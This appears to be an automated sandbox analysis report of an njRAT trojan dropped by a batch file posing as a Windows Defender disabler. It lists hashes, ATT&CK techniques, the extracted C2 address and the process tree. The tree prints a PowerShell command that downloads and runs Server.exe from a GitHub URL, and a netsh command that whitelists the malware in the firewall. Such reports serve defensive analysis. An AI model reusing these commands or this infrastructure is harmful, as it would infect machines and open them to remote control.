njrat | bc29f3e495e73cab8b5cc4b63d0048109fe3f33f3d209939a279053d4091448e

Analysis

max time kernel
149s
max time network
134s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
08-01-2025 22:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DisableWDv1.bat
Size

664B
MD5

d5ae652c3c0c4ed6269743dbfb5ce953
SHA1

43a8888f001b9b7e2629746848f2a1601acb60f2
SHA256

bc29f3e495e73cab8b5cc4b63d0048109fe3f33f3d209939a279053d4091448e
SHA512

2d05a38a154adfba0b2e6d0ff38a6c3e21b6f0ec840f5618bee6b06836aef255cf98d4ad578cedf4a49955fa1cb0c4d3255c028a47fd83dcc6af1e20b62e9499

Score

10^/10

njrat hacked discovery evasion execution persistence privilege_escalation trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/pebiko70/test/main/Server.exe

Extracted

Family

njrat

Version

im523

Botnet

HacKed

financial-amanda.gl.at.ply.gg:47287

Mutex

023b6c1e71ec3df384e0804152feb1fe

Attributes

reg_key
023b6c1e71ec3df384e0804152feb1fe
splitter
|'|'|

Signatures

Njrat family
njrat
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	1140	powershell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1456	netsh.exe

Executes dropped EXE 2 IoCs

pid	Process
956	Server.exe
4124	server.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1140	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	raw.githubusercontent.com
2	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1140	powershell.exe
1140	powershell.exe

Suspicious use of AdjustPrivilegeToken 36 IoCs

description	pid	Process
Token: SeDebugPrivilege	1140	powershell.exe
Token: SeDebugPrivilege	4124	server.exe
Token: 33	4124	server.exe
Token: SeIncBasePriorityPrivilege	4124	server.exe
Token: 33	4124	server.exe
Token: SeIncBasePriorityPrivilege	4124	server.exe
Token: 33	4124	server.exe
Token: SeIncBasePriorityPrivilege	4124	server.exe
Token: 33	4124	server.exe
Token: SeIncBasePriorityPrivilege	4124	server.exe
Token: 33	4124	server.exe
Token: SeIncBasePriorityPrivilege	4124	server.exe
Token: 33	4124	server.exe
Token: SeIncBasePriorityPrivilege	4124	server.exe
Token: 33	4124	server.exe
Token: SeIncBasePriorityPrivilege	4124	server.exe
Token: 33	4124	server.exe
Token: SeIncBasePriorityPrivilege	4124	server.exe
Token: 33	4124	server.exe
Token: SeIncBasePriorityPrivilege	4124	server.exe
Token: 33	4124	server.exe
Token: SeIncBasePriorityPrivilege	4124	server.exe
Token: 33	4124	server.exe
Token: SeIncBasePriorityPrivilege	4124	server.exe
Token: 33	4124	server.exe
Token: SeIncBasePriorityPrivilege	4124	server.exe
Token: 33	4124	server.exe
Token: SeIncBasePriorityPrivilege	4124	server.exe
Token: 33	4124	server.exe
Token: SeIncBasePriorityPrivilege	4124	server.exe
Token: 33	4124	server.exe
Token: SeIncBasePriorityPrivilege	4124	server.exe
Token: 33	4124	server.exe
Token: SeIncBasePriorityPrivilege	4124	server.exe
Token: 33	4124	server.exe
Token: SeIncBasePriorityPrivilege	4124	server.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4884	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 896 wrote to memory of 2088	896	cmd.exe	78
PID 896 wrote to memory of 2088	896	cmd.exe	78
PID 2088 wrote to memory of 1392	2088	net.exe	79
PID 2088 wrote to memory of 1392	2088	net.exe	79
PID 896 wrote to memory of 1140	896	cmd.exe	80
PID 896 wrote to memory of 1140	896	cmd.exe	80
PID 896 wrote to memory of 956	896	cmd.exe	81
PID 896 wrote to memory of 956	896	cmd.exe	81
PID 896 wrote to memory of 956	896	cmd.exe	81
PID 956 wrote to memory of 4124	956	Server.exe	82
PID 956 wrote to memory of 4124	956	Server.exe	82
PID 956 wrote to memory of 4124	956	Server.exe	82
PID 4124 wrote to memory of 1456	4124	server.exe	83
PID 4124 wrote to memory of 1456	4124	server.exe	83
PID 4124 wrote to memory of 1456	4124	server.exe	83

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DisableWDv1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:896
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2088
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:1392
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/pebiko70/test/main/Server.exe', 'C:\Users\Admin\AppData\Local\Temp\Server.exe')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1140
- C:\Users\Admin\AppData\Local\Temp\Server.exe
  "C:\Users\Admin\AppData\Local\Temp\Server.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:956
- - C:\Users\Admin\AppData\Roaming\server.exe
    "C:\Users\Admin\AppData\Roaming\server.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4124
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:1456

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4884

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\server.exe.log

Filesize
319B

MD5
2a0834560ed3770fc33d7a42f8229722

SHA1
c8c85f989e7a216211cf9e4ce90b0cc95354aa53

SHA256
8aa2d836004258f1a1195dc4a96215b685aed0c46a261a2860625d424e9402b6

SHA512
c5b64d84e57eb8cc387b5feedf7719f1f7ae21f6197169f5f73bc86deddb538b9af3c9952c94c4f69ae956e1656d11ab7441c292d2d850a4d2aaa9ec678f8e82

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
10KB

MD5
77a8b2c86dd26c214bc11c989789b62d

SHA1
8b0f2d9d0ded2d7f9bff8aed6aefd6b3fdd1a499

SHA256
e288c02cbba393c9703519e660bf8709331f11978c6d994ea2a1346eef462cb8

SHA512
c287e3ae580343c43a5354347ca5444f54840fba127a2b1edc897b1dfea286fa37b5808f6e89f535c4022db8b3f29448aa4cc2f41ab0f308eec525a99fac4e5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Server.exe

Filesize
37KB

MD5
4e183a4e5f7aab910c7dafb866445339

SHA1
e71b14cb3a391ab84badc8df27aad7d5f2e226df

SHA256
7a196f271f282e3d8abb7fb4f72f10c77204fd183fdaa3dd6cb38fa36c42612f

SHA512
318b0ec1b8708a4247ea203a2640fa15b81a036d7a61609d1ebb4ef383bcc7f900679fdd0c37f6b08719eee8aec35f55b5cc9124981c849702ab4e015ac4c00c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kctlbclv.eyk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/956-32-0x0000000075160000-0x0000000075711000-memory.dmp

Filesize
5.7MB

Download
memory/956-21-0x0000000075160000-0x0000000075711000-memory.dmp

Filesize
5.7MB

Download
memory/956-20-0x0000000075161000-0x0000000075162000-memory.dmp

Filesize
4KB

Download
memory/1140-10-0x00007FFF338B0000-0x00007FFF34372000-memory.dmp

Filesize
10.8MB

Download
memory/1140-16-0x00007FFF338B0000-0x00007FFF34372000-memory.dmp

Filesize
10.8MB

Download
memory/1140-12-0x00007FFF338B0000-0x00007FFF34372000-memory.dmp

Filesize
10.8MB

Download
memory/1140-11-0x00007FFF338B0000-0x00007FFF34372000-memory.dmp

Filesize
10.8MB

Download
memory/1140-0-0x00007FFF338B3000-0x00007FFF338B5000-memory.dmp

Filesize
8KB

Download
memory/1140-9-0x00000216DCEB0000-0x00000216DCED2000-memory.dmp

Filesize
136KB

Download